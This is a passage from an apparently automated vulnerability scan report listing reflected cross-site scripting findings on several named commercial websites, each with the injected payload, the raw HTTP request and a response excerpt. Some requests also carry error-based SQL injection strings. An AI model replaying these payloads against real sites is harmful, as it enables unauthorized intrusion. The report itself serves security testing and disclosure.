...[SNIP]...
ked) alert("You haven't selected any items.");
   return(ischecked);
}
function doupdate(){
   document.forms.checkoutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?mode=logineabd5</script><script>alert(1)</script>7b31a895f05&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
...[SNIP]...

5.104. http://www.my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /cart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f00f</script><script>alert(1)</script>5bebd3dd0d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001&9f00f</script><script>alert(1)</script>5bebd3dd0d2=1 HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 12:12:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 24835
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
koutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001&9f00f</script><script>alert(1)</script>5bebd3dd0d2=1';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
var savemenuaction='saveitem';
function dosaveitem(lid){
   if(savemenuaction=='saveitem'){
       if(!checkcheck
...[SNIP]...

5.105. http://www.my-happyfeet.com/cart.asp [refurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /cart.asp

Issue detail

The value of the refurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a19d</script><script>alert(1)</script>4cbf628a43b was submitted in the refurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D00017a19d</script><script>alert(1)</script>4cbf628a43b HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 12:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 24869
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
ckoutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D00017a19d</script><script>alert(1)</script>4cbf628a43b';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
var savemenuaction='saveitem';
function dosaveitem(lid){
   if(savemenuaction=='saveitem'){
       if(!checkchecked
...[SNIP]...

5.106. http://www.nutter.com/careers.php [CareerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The value of the CareerID request parameter is copied into the HTML document as plain text between tags. The payload d9278<script>alert(1)</script>0b50050f2f4 was submitted in the CareerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17d9278<script>alert(1)</script>0b50050f2f4&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:09:11 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 16006

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<BR>sql: SELECT CareerTitle FROM careers WHERE CareerID=17d9278<script>alert(1)</script>0b50050f2f4
<div id="NarrativeText">
...[SNIP]...

5.107. http://www.nutter.com/careers.php [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 98e53<script>alert(1)</script>438881afcf7 was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))98e53<script>alert(1)</script>438881afcf7&CareerID=17&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:08:37 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15919

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<br />
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '98e53<script>alert(1)</script>438881afcf7 LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...

5.108. http://www.paperg.com/jsfb/embed.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6d50b%3balert(1)//7f28521d945 was submitted in the bid parameter. This input was echoed as 6d50b;alert(1)//7f28521d945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=3922&bid=21236d50b%3balert(1)//7f28521d945 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:14:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43841
Connection: Keep-alive
Via: 1.1 AN-0016020122637050


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL21236d50b;alert(1)//7f28521d945 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=21236d50b%3balert(1)//7f28521d945';
// links stylesheets in head
function pg_linkss(filename)
{
   var head = document.getElementsByTagName('head')
...[SNIP]...

5.109. https://www.supermedia.com/spportal/spportalFlow.do [_flowId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the _flowId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99f8c"%3balert(1)//8ec3b57aa3 was submitted in the _flowId parameter. This input was echoed as 99f8c";alert(1)//8ec3b57aa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))99f8c"%3balert(1)//8ec3b57aa3 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource=default; CstrStatus=RVU

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:14:15 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 22973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
nt(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))99f8c";alert(1)//8ec3b57aa3' found; the flows available are: array<String>
...[SNIP]...

5.110. http://www.superpages.com/inc/social/soc.php [cg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/soc.php

Issue detail

The value of the cg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc74"%3balert(1)//9a46c961ede was submitted in the cg parameter. This input was echoed as dbc74";alert(1)//9a46c961ede in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9dbc74"%3balert(1)//9a46c961ede&ml=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:38:58 GMT
Server: Unspecified
Vary: Host
Content-Type: application/javascript
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Fri, 25-Mar-2011 19:53:58 GMT;path=/;httponly
Content-Length: 15089

var IE = document.all?true:false
if (!IE) document.captureEvents(Event.MOUSEMOVE)
document.onmousemove = getMouseXY;
var tempX = 0
var tempY = 0
function getMouseXY(e) {
if (IE) { // grab the x-y po
...[SNIP]...
<a target=\"_blank\" onclick=\"sp_soclink_click_track('')\" href=\"http://www.superpages.com/inc/social/sln.php?n=9dbc74";alert(1)//9a46c961ede&t="+ urlencode(document.title) +"&u="+ urlencode(location.href) +"&s=1\" title=\"\">
...[SNIP]...

5.111. https://www.territoryahead.com/account/login/loginmain%20.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 76ef5--><script>alert(1)</script>094fe3529e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account76ef5--><script>alert(1)</script>094fe3529e8/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:26:04 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301505878&v=3&e=1301507678363
UNIQUE_ID: eLFqGawSrRQAAGXGG2oAAAAM
SCRIPT_URL: /account76ef5--><script>alert(1)</script>094fe3529e8/login/loginmain .jsp
SCRIPT_URI: https://www.territoryahead.com/account76ef5-->
...[SNIP]...

5.112. https://www.territoryahead.com/account/login/loginmain%20.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 9d9e8--><script>alert(1)</script>cf4dc32b2d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login9d9e8--><script>alert(1)</script>cf4dc32b2d0/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
FCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301505878&v=3&e=1301507678363
UNIQUE_ID: mFwE36wSrSgAAEYWqmIAAAAU
SCRIPT_URL: /account/login9d9e8--><script>alert(1)</script>cf4dc32b2d0/loginmain .jsp
SCRIPT_URI: https://www.territoryahead.com/account/login9d9e8-->
...[SNIP]...

5.113. https://www.territoryahead.com/account/login/loginmain%20.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 55d6e--><script>alert(1)</script>83406a853e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp?55d6e--><script>alert(1)</script>83406a853e1=1 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:51 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 37104


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ET https://www.territoryahead.com/errorhandler.jsp?ruleID=8&itemID=0&itemType=ErrorPage&55d6e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E83406a853e1=1&status=404&itemID=0&itemType=ErrorPage&status=404&55d6e--><script>alert(1)</script>83406a853e1=1
Session ID: eDwn-UFCx4o7 (from cookie)

Parameters:
ruleID = 8
itemID = 0
itemID = 0
itemType = ErrorPage
itemType = ErrorPage
status = 404
status = 404
55d6e--&gt;&l
...[SNIP]...

5.114. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7f0d7--><script>alert(1)</script>33d952b95eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account7f0d7--><script>alert(1)</script>33d952b95eb/login/loginmain.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:51:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36978


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
et=Y; 90232094_clogin=l=1301081933&v=3&e=1301083737353; PS_ALL=%23ps_catid%7Eaccount; s_sq=%5B%5BB%5D%5D; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: 65Wsr6wSrSgAAETmf2MAAAAj
SCRIPT_URL: /account7f0d7--><script>alert(1)</script>33d952b95eb/login/loginmain.jsp
SCRIPT_URI: https://www.territoryahead.com/account7f0d7-->
...[SNIP]...

5.115. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 66835--><script>alert(1)</script>be9690c84fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login66835--><script>alert(1)</script>be9690c84fa/loginmain.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:51:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36978


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
90232094_clogin=l=1301081933&v=3&e=1301083737353; PS_ALL=%23ps_catid%7Eaccount; s_sq=%5B%5BB%5D%5D; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: 7JbBaKwSrSgAAEYNO4EAAAAC
SCRIPT_URL: /account/login66835--><script>alert(1)</script>be9690c84fa/loginmain.jsp
SCRIPT_URI: https://www.territoryahead.com/account/login66835-->
...[SNIP]...

5.116. https://www.territoryahead.com/account/orderhistory/orderstatus.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/orderhistory/orderstatus.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 36360--><script>alert(1)</script>6c3f9b7fbac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account36360--><script>alert(1)</script>6c3f9b7fbac/orderhistory/orderstatus.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
